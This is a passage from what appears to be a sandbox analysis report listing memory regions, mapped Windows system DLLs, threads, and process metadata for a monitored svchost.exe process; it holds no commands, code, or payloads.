"c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 4651 start_va = 0x7fef7440000 end_va = 0x7fef744bfff monitored = 0 entry_point = 0x7fef744419c region_type = mapped_file name = "apphlpdm.dll" filename = "\\Windows\\System32\\Apphlpdm.dll" (normalized: "c:\\windows\\system32\\apphlpdm.dll") Region: id = 4668 start_va = 0x7fefe280000 end_va = 0x7feff007fff monitored = 0 entry_point = 0x7fefe2fcebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4669 start_va = 0x7fef7680000 end_va = 0x7fef76fbfff monitored = 0 entry_point = 0x7fef76811d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 4670 start_va = 0x1c00000 end_va = 0x1ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 4677 start_va = 0x7fef7330000 end_va = 0x7fef7346fff monitored = 0 entry_point = 0x7fef733d308 region_type = mapped_file name = "portabledeviceconnectapi.dll" filename = "\\Windows\\System32\\PortableDeviceConnectApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceconnectapi.dll") Region: id = 4702 start_va = 0x7fefd990000 end_va = 0x7fefd9cafff monitored = 0 entry_point = 0x7fefd991324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 4703 start_va = 0x7fefdb20000 end_va = 0x7fefdc8cfff monitored = 0 entry_point = 0x7fefdb210b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4704 start_va = 0x7fefd960000 end_va = 0x7fefd96efff monitored = 0 entry_point = 0x7fefd961020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Thread: id = 296 os_tid = 0x2fc Thread: id = 297 os_tid = 0x300 Thread: id = 298 os_tid = 0x304 Thread: id = 299 os_tid = 0x308 Thread: id = 300 os_tid = 0x30c Thread: id = 308 os_tid = 0x334 Thread: id = 309 os_tid = 0x338 Thread: id = 310 os_tid = 0x33c Thread: id = 313 os_tid = 0x34c Thread: id = 314 os_tid = 0x358 Thread: id = 337 os_tid = 0x3a0 Thread: id = 341 os_tid = 0x3b0 Thread: id = 342 os_tid = 0x3bc Thread: id = 343 os_tid = 0x3c0 Thread: id = 348 os_tid = 0x3d8 Thread: id = 349 os_tid = 0x3dc Thread: id = 355 os_tid = 0x3f4 Thread: id = 356 os_tid = 0x3f8 Thread: id = 361 os_tid = 0x114 Thread: id = 362 os_tid = 0x110 Thread: id = 395 os_tid = 0x418 Thread: id = 396 os_tid = 0x41c Thread: id = 462 os_tid = 0x55c Thread: id = 463 os_tid = 0x568 Thread: id = 466 os_tid = 0x574 Thread: id = 468 os_tid = 0x57c Thread: id = 501 os_tid = 0x618 Thread: id = 502 os_tid = 0x624 Thread: id = 507 os_tid = 0x634 Thread: id = 525 os_tid = 0x67c Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x27faa000" os_pid = "0x310" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d804" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2390 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2391 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2392 start_va = 0x130000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 2393 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2394 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2395 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2396 start_va = 0xffce0000 end_va = 0xffceafff monitored = 0 entry_point = 0xffce246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2397 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2398 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2399 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2400 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2401 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2402 start_va = 0x200000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2403 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2404 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2405 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2406 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2407 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2408 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2409 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2410 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2411 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2412 start_va = 0x300000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 2413 start_va = 0x390000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 2414 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2415 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2416 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2417 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2418 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2419 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2420 start_va = 0x490000 end_va = 0x617fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 2421 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2422 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2423 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2424 start_va = 0x620000 end_va = 0x7a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 2425 start_va = 0x7b0000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 2426 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2427 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2428 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2429 start_va = 0x300000 end_va = 0x37cfff monitored = 0 entry_point = 0x30cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2430 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 2431 start_va = 0x300000 end_va = 0x37cfff monitored = 0 entry_point = 0x30cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2432 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2433 start_va = 0x9c0000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 2434 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2435 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2436 start_va = 0x8a0000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 2437 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2438 start_va = 0xb00000 end_va = 0xb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 2439 start_va = 0xb80000 end_va = 0xbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 2440 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2441 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2442 start_va = 0xc00000 end_va = 0xecefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2449 start_va = 0x7fefc3a0000 end_va = 0x7fefc3bcfff monitored = 0 entry_point = 0x7fefc3a2f18 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 2451 start_va = 0x7fefc390000 end_va = 0x7fefc398fff monitored = 0 entry_point = 0x7fefc391010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2806 start_va = 0xa40000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 2807 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2811 start_va = 0x300000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 2812 start_va = 0xfa0000 end_va = 0x101ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 2813 start_va = 0x1030000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 2814 start_va = 0x7fefb6b0000 end_va = 0x7fefb771fff monitored = 0 entry_point = 0x7fefb6b101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 2815 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 2816 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 2817 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2820 start_va = 0x7fefcc50000 end_va = 0x7fefcc6afff monitored = 0 entry_point = 0x7fefcc52068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2821 start_va = 0x7feff810000 end_va = 0x7feff861fff monitored = 0 entry_point = 0x7feff8110d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2822 start_va = 0x7fefd460000 end_va = 0x7fefd46afff monitored = 0 entry_point = 0x7fefd461030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2823 start_va = 0x7fefd780000 end_va = 0x7fefd7a4fff monitored = 0 entry_point = 0x7fefd789658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2824 start_va = 0x7feff870000 end_va = 0x7feff877fff monitored = 0 entry_point = 0x7feff871504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2825 start_va = 0x7fefd510000 end_va = 0x7fefd519fff monitored = 0 entry_point = 0x7fefd513b40 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 2827 start_va = 0x7fefb690000 end_va = 0x7fefb6a4fff monitored = 0 entry_point = 0x7fefb6960d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2830 start_va = 0x10b0000 end_va = 0x129ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 2834 start_va = 0x7fefb620000 end_va = 0x7fefb656fff monitored = 0 entry_point = 0x7fefb628424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 2841 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2842 start_va = 0x7fefcc70000 end_va = 0x7fefcc8dfff monitored = 0 entry_point = 0x7fefcc713b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2843 start_va = 0x7fefd8c0000 end_va = 0x7fefd8cefff monitored = 0 entry_point = 0x7fefd8c19b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2844 start_va = 0x7feff8d0000 end_va = 0x7feff940fff monitored = 0 entry_point = 0x7feff8e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2852 start_va = 0x7fefb4d0000 end_va = 0x7fefb4e8fff monitored = 0 entry_point = 0x7fefb4d11a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2853 start_va = 0x7fefb4c0000 end_va = 0x7fefb4cffff monitored = 0 entry_point = 0x7fefb4c835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 2854 start_va = 0x7fefd880000 end_va = 0x7fefd8bcfff monitored = 0 entry_point = 0x7fefd8818f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2855 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2856 start_va = 0x12a0000 end_va = 0x148ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 2857 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2858 start_va = 0x7feffbe0000 end_va = 0x7feffc78fff monitored = 0 entry_point = 0x7feffbe1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2859 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2860 start_va = 0x1b0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x1b1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2861 start_va = 0x1b0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x1b1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2862 start_va = 0x1b0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x1b1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2863 start_va = 0x1b0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x1b1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2864 start_va = 0x1b0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x1b1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2865 start_va = 0x7fefceb0000 end_va = 0x7fefcef6fff monitored = 0 entry_point = 0x7fefceb1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2910 start_va = 0xf00000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 2911 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 2912 start_va = 0x7fefb470000 end_va = 0x7fefb47bfff monitored = 0 entry_point = 0x7fefb4715d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 2958 start_va = 0x7fefb460000 end_va = 0x7fefb46afff monitored = 0 entry_point = 0x7fefb464f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 2960 start_va = 0x10e0000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 2961 start_va = 0x1290000 end_va = 0x129ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001290000" filename = "" Region: id = 2962 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 2963 start_va = 0x11d0000 end_va = 0x124ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 2964 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 2965 start_va = 0x12d0000 end_va = 0x134ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 2966 start_va = 0x1410000 end_va = 0x148ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 2967 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 2986 start_va = 0x1490000 end_va = 0x15adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "aero.msstyles" filename = "\\Windows\\Resources\\Themes\\Aero\\aero.msstyles" (normalized: "c:\\windows\\resources\\themes\\aero\\aero.msstyles") Region: id = 2987 start_va = 0x7fefc0b0000 end_va = 0x7fefc105fff monitored = 0 entry_point = 0x7fefc0bbbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2988 start_va = 0x1490000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001490000" filename = "" Region: id = 2989 start_va = 0x1600000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001600000" filename = "" Region: id = 2990 start_va = 0x2000000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002000000" filename = "" Region: id = 2991 start_va = 0x1490000 end_va = 0x156efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001490000" filename = "" Region: id = 2992 start_va = 0x1580000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 2993 start_va = 0x1490000 end_va = 0x156efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001490000" filename = "" Region: id = 2994 start_va = 0x1490000 end_va = 0x156efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001490000" filename = "" Region: id = 3170 start_va = 0x14c0000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 3171 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3173 start_va = 0x7fefb380000 end_va = 0x7fefb393fff monitored = 0 entry_point = 0x7fefb383e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 3176 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 3177 start_va = 0x7feff880000 end_va = 0x7feff8ccfff monitored = 0 entry_point = 0x7feff881070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3181 start_va = 0x7fefbe60000 end_va = 0x7fefbe8cfff monitored = 0 entry_point = 0x7fefbe61010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3182 start_va = 0x7fefc370000 end_va = 0x7fefc38cfff monitored = 0 entry_point = 0x7fefc371ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 3183 start_va = 0x100000 end_va = 0x10afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 3249 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 3250 start_va = 0x14e0000 end_va = 0x155ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 3251 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 